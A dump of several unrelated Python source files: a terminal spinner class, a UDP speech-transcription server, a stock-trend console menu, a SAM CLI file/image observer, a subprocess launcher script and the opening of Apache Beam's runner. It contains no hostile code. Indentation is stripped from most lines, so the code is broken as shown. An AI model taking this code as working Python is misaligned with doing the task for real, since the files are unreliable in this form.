def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
# Subtract to the current terminal size the max spinner length
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
            elif animation == 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
if not self._enabled:
return self
self._stream.write('\r')
self._stream.write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
frame = self.frame()
output = '\r{0}'.format(frame)
self.clear()
self._stream.write(output)
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
        str
            The frame to be rendered
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
        str
            The text frame to be rendered
"""
if len(self._text['frames']) == 1:
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide(stream=self._stream)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if not self._enabled:
return self
if self._spinner_thread:
self._stop_spinner.set()
self._spinner_thread.join()
self._frame_index = 0
self._spinner_id = None
self.clear()
if self._stream.isatty():
cursor.show(stream=self._stream)
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
self._stream.write(output)
return self
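# Hedged usage sketch (not part of the library itself): typical ways the Halo class above is driven,
# either as a context manager or via start()/stop(). The text and spinner name are arbitrary examples.
def _example_halo_usage():
    with Halo(text='Loading', spinner='dots'):
        time.sleep(1)  # do some work while the spinner renders
    spinner = Halo(text='Downloading', spinner='dots')
    spinner.start()
    time.sleep(1)
    spinner.succeed('Done')  # stops the spinner and persists a success symbol with the text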
|
opus_server.py
|
import asyncio
import zlib
import queue
import threading
import audioop
from google.cloud import speech
from opuslib import Decoder
from config.config import Config
from config.config import Server
from config.config import Opus
buffer = queue.Queue()
buffer_response = queue.Queue()
dec = Decoder(Opus.rate, Opus.channels)
def chunks():
while True:
try:
yield buffer.get(timeout = 1)
except queue.Empty:
break
def get_transcription():
while True:
generator = chunks()
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=Config.encoding,
language_code=Config.language,
sample_rate_hertz=Opus.rate
)
config = speech.types.StreamingRecognitionConfig(config=config, interim_results = True)
requests = (speech.types.StreamingRecognizeRequest(audio_content=chunk) for chunk in generator)
results = client.streaming_recognize(config, requests)
for result in results:
print(result)
for data in result.results:
for parts in data.alternatives:
buffer_response.put(parts.transcript)
def activate_job():
background = threading.Thread(target=get_transcription, args=())
background.daemon = True
background.start()
class EchoServerProtocol(asyncio.DatagramProtocol):
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
message = dec.decode(zlib.decompress(data), Opus.chunk)
buffer.put(message)
if buffer_response.empty():
self.transport.sendto(b'', addr)
else:
self.transport.sendto(buffer_response.get().encode(), addr)
def run_server():
loop = asyncio.get_event_loop()
listen = loop.create_datagram_endpoint(
EchoServerProtocol, local_addr=(Server.host, Server.port))
transport, protocol = loop.run_until_complete(listen)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
transport.close()
loop.close()
if __name__ == '__main__':
activate_job()
run_server()
|
console_trend.py
|
import time
import threading
import logging
import matplotlib.pyplot as plt
from analysis.trend import SupportResistance
from data import store as store
from utils import ui
_logger = ui.get_logger(logging.WARNING, logfile='')
class Interface:
def __init__(self, tickers: list[str] = [], days: int = 1000, quick: bool = False, exit: bool = False):
self.tickers = [t.upper() for t in tickers]
self.days = days
self.quick = quick
self.exit = exit
self.trend: SupportResistance = None
self.task: threading.Thread = None
quit = False
for ticker in tickers:
if not store.is_ticker(ticker.upper()):
ui.print_error(f'Invalid ticker: {ticker}')
quit = True
break
if quit:
pass
elif self.exit:
self.calculate_support_and_resistance()
else:
self.main_menu()
def main_menu(self):
while True:
menu_items = {
'1': 'Change Ticker',
'2': 'Add Ticker',
'3': f'Days ({self.days})',
'4': 'Calculate Support & Resistance',
'0': 'Exit'
}
if self.tickers:
menu_items['1'] = f'Change Ticker ({", ".join(self.tickers)})'
if self.quick:
menu_items['4'] += ' (quick)'
selection = ui.menu(menu_items, 'Select Operation', 0, len(menu_items)-1)
if selection == 1:
self.select_ticker()
            elif selection == 2:
self.add_ticker()
elif selection == 3:
self.select_days()
elif selection == 4:
self.calculate_support_and_resistance()
elif selection == 0:
self.exit = True
if self.exit:
break
def select_ticker(self):
valid = False
while not valid:
ticker = input('Please enter symbol, or 0 to cancel: ').upper()
if ticker != '0':
valid = store.is_ticker(ticker)
if valid:
self.tickers = [ticker]
else:
ui.print_error('Invalid ticker symbol. Try again or select "0" to cancel')
else:
break
def add_ticker(self):
valid = False
while not valid:
ticker = input('Please enter ticker, or 0 to cancel: ').upper()
if ticker != '0':
valid = store.is_ticker(ticker)
if valid:
self.tickers += [ticker]
else:
ui.print_error('Invalid ticker. Try again or enter 0 to cancel')
else:
break
def select_days(self):
self.days = 0
while self.days < 30:
self.days = ui.input_integer('Enter number of days: ', 30, 9999)
def calculate_support_and_resistance(self):
if self.tickers:
ui.progress_bar(0, 0, reset=True)
for ticker in self.tickers:
if self.quick:
self.trend = SupportResistance(ticker, days=self.days)
else:
methods = ['NSQUREDLOGN', 'NCUBED', 'HOUGHLINES', 'PROBHOUGH']
extmethods = ['NAIVE', 'NAIVECONSEC', 'NUMDIFF']
self.trend = SupportResistance(ticker, methods=methods, extmethods=extmethods, days=self.days)
self.task = threading.Thread(target=self.trend.calculate)
self.task.start()
self._show_progress()
figure = self.trend.plot()
plt.figure(figure)
print()
plt.show()
else:
ui.print_error('Enter a ticker before calculating')
def _show_progress(self) -> None:
while not self.trend.task_error:
pass
if self.trend.task_error == 'None':
while self.trend.task_error == 'None':
time.sleep(0.20)
ui.progress_bar(0, 0, suffix=self.trend.task_message)
if self.trend.task_error == 'Hold':
pass
elif self.trend.task_error == 'Done':
ui.print_message(f'{self.trend.task_error}: {self.trend.task_total} lines extracted in {self.trend.task_time:.1f} seconds')
else:
ui.print_error(f'{self.trend.task_error}: Error extracting lines')
else:
ui.print_message(f'{self.trend.task_error}')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Technical Analysis')
parser.add_argument('-t', '--tickers', nargs='+', help='Run using tickers')
parser.add_argument('-d', '--days', help='Days to run analysis', default=1000)
parser.add_argument('-q', '--quick', help='Run quick analysis', action='store_true')
parser.add_argument('-x', '--exit', help='Run trend analysis then exit (only valid with -t)', action='store_true')
command = vars(parser.parse_args())
if command['tickers']:
Interface(tickers=command['tickers'], days=int(command['days']), quick=command['quick'], exit=command['exit'])
else:
Interface(days=int(command['days']), quick=command['quick'])
|
file_observer.py
|
"""
Wraps watchdog to observe file system for any change.
"""
import logging
import threading
import uuid
from abc import ABC, abstractmethod
from pathlib import Path
from threading import Thread, Lock
from typing import Callable, List, Dict, Optional
import docker
from docker import DockerClient
from docker.errors import ImageNotFound
from docker.types import CancellableStream
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler, FileSystemEvent, FileSystemEventHandler
from watchdog.observers.api import ObservedWatch, BaseObserver
from samcli.cli.global_config import Singleton
from samcli.lib.utils.hash import dir_checksum, file_checksum
from samcli.lib.utils.packagetype import ZIP, IMAGE
from samcli.local.lambdafn.config import FunctionConfig
LOG = logging.getLogger(__name__)
class ResourceObserver(ABC):
@abstractmethod
def watch(self, resource: str) -> None:
"""
Start watching the input resource.
Parameters
----------
resource: str
The resource that should be observed for modifications
Raises
------
ObserverException:
            if the input resource does not exist
"""
@abstractmethod
def unwatch(self, resource: str) -> None:
"""
        Remove the input resource from the observed resources
Parameters
----------
resource: str
The resource to be unobserved
"""
@abstractmethod
def start(self):
"""
Start Observing.
"""
@abstractmethod
def stop(self):
"""
Stop Observing.
"""
class ObserverException(Exception):
"""
Exception raised when unable to observe the input Lambda Function.
"""
class LambdaFunctionObserver:
"""
    A class that will observe Lambda Function sources, regardless of whether the source is code or an image
"""
def __init__(self, on_change: Callable) -> None:
"""
        Initialize the Lambda function observer
        Parameters
        ----------
        on_change:
            Reference to the function that will be called if there is a change in any of the observed functions
"""
self._observers: Dict[str, ResourceObserver] = {
ZIP: FileObserver(self._on_zip_change),
IMAGE: ImageObserver(self._on_image_change),
}
self._observed_functions: Dict[str, Dict[str, List[FunctionConfig]]] = {
ZIP: {},
IMAGE: {},
}
def _get_zip_lambda_function_paths(function_config: FunctionConfig) -> List[str]:
"""
Returns a list of ZIP package type lambda function source code paths
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Returns
-------
list[str]
List of lambda functions' source code paths to be observed
"""
code_paths = [function_config.code_abs_path]
if function_config.layers:
# Non-local layers will not have a codeuri property and don't need to be observed
code_paths += [layer.codeuri for layer in function_config.layers if layer.codeuri]
return code_paths
def _get_image_lambda_function_image_names(function_config: FunctionConfig) -> List[str]:
"""
Returns a list of Image package type lambda function image names
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Returns
-------
list[str]
List of lambda functions' image names to be observed
"""
return [function_config.imageuri]
self.get_resources: Dict[str, Callable] = {
ZIP: _get_zip_lambda_function_paths,
IMAGE: _get_image_lambda_function_image_names,
}
self._input_on_change: Callable = on_change
self._watch_lock: Lock = threading.Lock()
def _on_zip_change(self, paths: List[str]) -> None:
"""
        It gets executed once there is a change in one of the watched lambda functions' source code.
Parameters
----------
paths: list[str]
the changed lambda functions' source code paths
"""
self._on_change(paths, ZIP)
def _on_image_change(self, images: List[str]) -> None:
"""
        It gets executed once there is a change in one of the watched lambda functions' images.
Parameters
----------
images: list[str]
the changed lambda functions' images names
"""
self._on_change(images, IMAGE)
def _on_change(self, resources: List[str], package_type: str) -> None:
"""
        It gets executed once there is a change in one of the watched lambda functions' resources.
        Parameters
        ----------
        resources: list[str]
            the changed lambda functions' resources (either source code paths or image names)
        package_type: str
            determines if the changed resource is a source code path or an image name
"""
with self._watch_lock:
changed_functions: List[FunctionConfig] = []
for resource in resources:
if self._observed_functions[package_type].get(resource, None):
changed_functions += self._observed_functions[package_type][resource]
self._input_on_change(changed_functions)
def watch(self, function_config: FunctionConfig) -> None:
"""
Start watching the input lambda function.
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
Raises
------
ObserverException:
if not able to observe the input function source path/image
"""
with self._watch_lock:
if self.get_resources.get(function_config.packagetype, None):
resources = self.get_resources[function_config.packagetype](function_config)
for resource in resources:
functions = self._observed_functions[function_config.packagetype].get(resource, [])
functions += [function_config]
self._observed_functions[function_config.packagetype][resource] = functions
self._observers[function_config.packagetype].watch(resource)
def unwatch(self, function_config: FunctionConfig) -> None:
"""
Remove the input lambda function from the observed functions
Parameters
----------
function_config: FunctionConfig
The lambda function configuration that will be observed
"""
if self.get_resources.get(function_config.packagetype, None):
resources = self.get_resources[function_config.packagetype](function_config)
for resource in resources:
functions = self._observed_functions[function_config.packagetype].get(resource, [])
if function_config in functions:
functions.remove(function_config)
if not functions:
self._observed_functions[function_config.packagetype].pop(resource, None)
self._observers[function_config.packagetype].unwatch(resource)
def start(self):
"""
Start Observing.
"""
for _, observer in self._observers.items():
observer.start()
def stop(self):
"""
Stop Observing.
"""
for _, observer in self._observers.items():
observer.stop()
class ImageObserverException(ObserverException):
"""
Exception raised when unable to observe the input image.
"""
class ImageObserver(ResourceObserver):
"""
A class that will observe some docker images for any change.
"""
def __init__(self, on_change: Callable) -> None:
"""
Initialize the Image observer
Parameters
----------
on_change:
            Reference to the function that will be called if there is a change in any of the observed images
"""
self._observed_images: Dict[str, str] = {}
self._input_on_change: Callable = on_change
self.docker_client: DockerClient = docker.from_env()
self.events: CancellableStream = self.docker_client.events(filters={"type": "image"}, decode=True)
self._images_observer_thread: Optional[Thread] = None
self._lock: Lock = threading.Lock()
def _watch_images_events(self):
for event in self.events:
if event.get("Action", None) != "tag":
continue
image_name = event["Actor"]["Attributes"]["name"]
if self._observed_images.get(image_name, None):
new_image_id = event["id"]
if new_image_id != self._observed_images[image_name]:
self._observed_images[image_name] = new_image_id
self._input_on_change([image_name])
def watch(self, resource: str) -> None:
"""
Start watching the input image.
Parameters
----------
resource: str
The container image name that will be observed
Raises
------
ImageObserverException:
            if the input image_name does not exist
"""
try:
image = self.docker_client.images.get(resource)
self._observed_images[resource] = image.id
except ImageNotFound as exc:
            raise ImageObserverException("Cannot observe a non-existent image") from exc
def unwatch(self, resource: str) -> None:
"""
Remove the input image form the observed images
Parameters
----------
resource: str
The container image name to be unobserved
"""
self._observed_images.pop(resource, None)
def start(self):
"""
Start Observing.
"""
with self._lock:
if not self._images_observer_thread:
self._images_observer_thread = threading.Thread(target=self._watch_images_events, daemon=True)
self._images_observer_thread.start()
def stop(self):
"""
Stop Observing.
"""
with self._lock:
self.events.close()
# wait until the images observer thread got stopped
while self._images_observer_thread and self._images_observer_thread.is_alive():
pass
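# Usage sketch (not part of the original module): a minimal, hypothetical example of
# wiring an ImageObserver to a callback. It assumes a local docker daemon is running
# and that the illustrative image "nginx:latest" has already been pulled; otherwise
# watch() raises ImageObserverException.
def _example_image_observer():
    def on_images_changed(image_names):
        # Called with the observed image names whose id changed after a re-tag.
        print(f"images changed: {image_names}")

    observer = ImageObserver(on_change=on_images_changed)
    observer.watch("nginx:latest")  # hypothetical image name
    observer.start()
    # ... rebuild / re-tag the image elsewhere, then:
    observer.stop()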
class FileObserverException(ObserverException):
"""
Exception raised when unable to observe the input path.
"""
class FileObserver(ResourceObserver):
"""
    A class that wraps the Singleton File Observer.
"""
def __init__(self, on_change: Callable) -> None:
"""
Initialize the file observer
Parameters
----------
on_change:
            Reference to the function that will be called if there is a change in any of the observed paths
"""
self._group = str(uuid.uuid4())
self._single_file_observer = SingletonFileObserver()
self._single_file_observer.add_group(self._group, on_change)
def watch(self, resource: str) -> None:
self._single_file_observer.watch(resource, self._group)
def unwatch(self, resource: str) -> None:
self._single_file_observer.unwatch(resource, self._group)
def start(self):
self._single_file_observer.start()
def stop(self):
self._single_file_observer.stop()
class SingletonFileObserver(metaclass=Singleton):
"""
A Singleton class that will observe some file system paths for any change for multiple purposes.
"""
def __init__(self) -> None:
"""
Initialize the file observer
"""
self._observed_paths_per_group: Dict[str, Dict[str, str]] = {}
self._observed_groups_handlers: Dict[str, Callable] = {}
self._observed_watches: Dict[str, ObservedWatch] = {}
self._watch_dog_observed_paths: Dict[str, List[str]] = {}
self._observer: BaseObserver = Observer()
self._code_modification_handler: PatternMatchingEventHandler = PatternMatchingEventHandler(
patterns=["*"], ignore_patterns=[], ignore_directories=False
)
self._code_deletion_handler: PatternMatchingEventHandler = PatternMatchingEventHandler(
patterns=["*"], ignore_patterns=[], ignore_directories=False
)
self._code_modification_handler.on_modified = self.on_change
self._code_deletion_handler.on_deleted = self.on_change
self._watch_lock = threading.Lock()
self._lock: Lock = threading.Lock()
def on_change(self, event: FileSystemEvent) -> None:
"""
        Executed whenever watchdog reports a change in one of the observed paths.
        This method checks whether any of the observed paths has actually changed, and if so it
        invokes the group's on_change callback with the changed paths
Parameters
----------
event: watchdog.events.FileSystemEvent
            Describes the change that happened to some file/dir in the observed paths
"""
with self._watch_lock:
LOG.debug("a %s change got detected in path %s", event.event_type, event.src_path)
for group, _observed_paths in self._observed_paths_per_group.items():
if event.event_type == "deleted":
observed_paths = [
path
for path in _observed_paths
if path == event.src_path
or path in self._watch_dog_observed_paths.get(f"{event.src_path}_False", [])
]
else:
observed_paths = [path for path in _observed_paths if event.src_path.startswith(path)]
if not observed_paths:
continue
LOG.debug("affected paths of this change %s", observed_paths)
changed_paths = []
for path in observed_paths:
path_obj = Path(path)
# The path got deleted
if not path_obj.exists():
_observed_paths.pop(path, None)
changed_paths += [path]
else:
new_checksum = calculate_checksum(path)
if new_checksum and new_checksum != _observed_paths.get(path, None):
changed_paths += [path]
_observed_paths[path] = new_checksum
else:
LOG.debug("the path %s content does not change", path)
if changed_paths:
self._observed_groups_handlers[group](changed_paths)
def add_group(self, group: str, on_change: Callable) -> None:
"""
        Add a new group to the file observer. This enables FileObserver to watch the same path for
        multiple purposes.
Parameters
----------
group: str
            unique string defining a new group of paths to be watched.
on_change: Callable
            The method to be called if any path related to this group changes.
"""
if group in self._observed_paths_per_group:
raise Exception(f"The group {group} of paths is already watched")
self._observed_paths_per_group[group] = {}
self._observed_groups_handlers[group] = on_change
def watch(self, resource: str, group: str) -> None:
"""
        Start watching the input path. The file observer keeps track of the input path together with its hash,
        so that it can later check whether the path content really changed.
        The parent path is also handed to watchdog for observation, so that deletion of the input path itself
        is not missed.
Parameters
----------
resource: str
The file/dir path to be observed
group: str
            unique string identifying the group of paths this path belongs to.
Raises
------
FileObserverException:
            if the input path does not exist
"""
with self._watch_lock:
path_obj = Path(resource)
if not path_obj.exists():
                raise FileObserverException("Cannot observe a non-existent path")
_observed_paths = self._observed_paths_per_group[group]
_check_sum = calculate_checksum(resource)
if not _check_sum:
raise Exception(f"Failed to calculate the hash of resource {resource}")
_observed_paths[resource] = _check_sum
LOG.debug("watch resource %s", resource)
# recursively watch the input path, and all child path for any modification
self._watch_path(resource, resource, self._code_modification_handler, True)
LOG.debug("watch resource %s's parent %s", resource, str(path_obj.parent))
# watch only the direct parent path child directories for any deletion
# Parent directory watching is needed, as if the input path got deleted,
# watchdog will not send an event for it
self._watch_path(str(path_obj.parent), resource, self._code_deletion_handler, False)
def _watch_path(
self, watch_dog_path: str, original_path: str, watcher_handler: FileSystemEventHandler, recursive: bool
) -> None:
"""
        Update the observed paths data structure, and ask the watchdog observer to observe the input
        watchdog path if it is not already observed
Parameters
----------
watch_dog_path: str
The file/dir path to be observed by watch dog
original_path: str
The original input file/dir path to be observed
watcher_handler: FileSystemEventHandler
The watcher event handler
recursive: bool
determines if we need to watch the path, and all children paths recursively, or just the direct children
paths
"""
        # Allow watching the same path in two modes: recursively and non-recursively.
# here, we need to only watch the input path in a specific recursive mode
original_watch_dog_path = watch_dog_path
watch_dog_path = f"{watch_dog_path}_{recursive}"
child_paths = self._watch_dog_observed_paths.get(watch_dog_path, [])
first_time = not bool(child_paths)
if original_path not in child_paths:
child_paths += [original_path]
self._watch_dog_observed_paths[watch_dog_path] = child_paths
if first_time:
LOG.debug("Create Observer for resource %s with recursive %s", original_watch_dog_path, recursive)
self._observed_watches[watch_dog_path] = self._observer.schedule(
watcher_handler, original_watch_dog_path, recursive=recursive
)
def unwatch(self, resource: str, group: str) -> None:
"""
        Remove the input path from the observed paths, and stop watching this path.
Parameters
----------
resource: str
The file/dir path to be unobserved
group: str
            unique string identifying the group of paths this path belongs to.
"""
path_obj = Path(resource)
LOG.debug("unwatch resource %s", resource)
# unwatch input path
self._unwatch_path(resource, resource, group, True)
LOG.debug("unwatch resource %s's parent %s", resource, str(path_obj.parent))
# unwatch parent path
self._unwatch_path(str(path_obj.parent), resource, group, False)
def _unwatch_path(self, watch_dog_path: str, original_path: str, group: str, recursive: bool) -> None:
"""
        Update the observed paths data structure, and unschedule the watchdog observer for the input
        watchdog path once no other observed path still needs it
Parameters
----------
watch_dog_path: str
The file/dir path to be unobserved by watch dog
original_path: str
The original input file/dir path to be unobserved
group: str
            unique string identifying the group of paths this path belongs to.
recursive: bool
determines if we need to watch the path, and all children paths recursively, or just the direct children
paths
"""
        # Allow watching the same path in two modes: recursively and non-recursively.
# here, we need to only stop watching the input path in a specific recursive mode
original_watch_dog_path = watch_dog_path
watch_dog_path = f"{watch_dog_path}_{recursive}"
_observed_paths = self._observed_paths_per_group[group]
child_paths = self._watch_dog_observed_paths.get(watch_dog_path, [])
if original_path in child_paths:
child_paths.remove(original_path)
_observed_paths.pop(original_path, None)
if not child_paths:
self._watch_dog_observed_paths.pop(watch_dog_path, None)
if self._observed_watches.get(watch_dog_path, None):
LOG.debug("Unschedule Observer for resource %s with recursive %s", original_watch_dog_path, recursive)
self._observer.unschedule(self._observed_watches[watch_dog_path])
self._observed_watches.pop(watch_dog_path, None)
def start(self):
"""
Start Observing.
"""
with self._lock:
if not self._observer.is_alive():
self._observer.start()
def stop(self):
"""
Stop Observing.
"""
with self._lock:
if self._observer.is_alive():
self._observer.stop()
def calculate_checksum(path: str) -> Optional[str]:
    """
    Calculate a checksum for the input path.
    Returns the file checksum if the path is a file, the directory checksum if it is a
    directory, or None if the checksum could not be calculated.
    """
    try:
        path_obj = Path(path)
        if path_obj.is_file():
            checksum = file_checksum(path)
        else:
            checksum = dir_checksum(path)
        return checksum
    except Exception:
        return None
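# Usage sketch (not part of the original module): a minimal, hypothetical example of
# watching a directory with FileObserver. The path below is illustrative; watch()
# raises FileObserverException if it does not exist.
def _example_file_observer():
    def on_paths_changed(paths):
        # Called with the observed paths whose checksum changed or which were deleted.
        print(f"paths changed: {paths}")

    observer = FileObserver(on_change=on_paths_changed)
    observer.watch("/tmp/my-lambda-code")  # hypothetical path
    observer.start()
    # ... modify or delete files under the path elsewhere, then:
    observer.unwatch("/tmp/my-lambda-code")
    observer.stop()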
|
setup.py
|
from multiprocessing import Process
import subprocess
from setup_db import *
import time
import os
DATA_COLLECTOR_PATH = './event_listener.js'
DATA_PROCESS_PATH = './process_data.py'
def node_call(path, *args):
    # Run a Node.js script as a subprocess and echo its stdout.
    print(f'Node script at {path} called......')
    p = subprocess.Popen(['node', path, *args], stdout=subprocess.PIPE)
    out = p.stdout.read()  # blocks until the script closes stdout
    print(out)
def python_call(path, *args):
    # Run a Python script as a subprocess and echo its stdout.
    print(f'Python script at {path} called......')
    p = subprocess.Popen(['python', path, *args], stdout=subprocess.PIPE)
    out = p.stdout.read()  # blocks until the script closes stdout
    print(out)
if __name__ == '__main__':
    # Run the event listener and the data processor in parallel.
    p1 = Process(target=node_call, args=[DATA_COLLECTOR_PATH])
    p2 = Process(target=python_call, args=[DATA_PROCESS_PATH])
    p1.start()
    p2.start()
    p1.join()
    p2.join()
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.metrics.metricbase import MetricName
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
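# Usage sketch (informal, not from the original source): the runner pushes an
# InstructionRequest onto a ControlConnection and gets back a ControlFuture; the
# response arrives on the background 'beam_control_read' thread, which resolves the
# future keyed by instruction_id. Roughly:
#
#   conn = control_servicer.get_conn_by_worker_id('worker_0')
#   future = conn.push(beam_fn_api_pb2.InstructionRequest(...))
#   response = future.get()  # blocks until _read() sets the result
#
# The '...' payload above is illustrative; real requests are built by the
# BundleManager later in this module.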
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
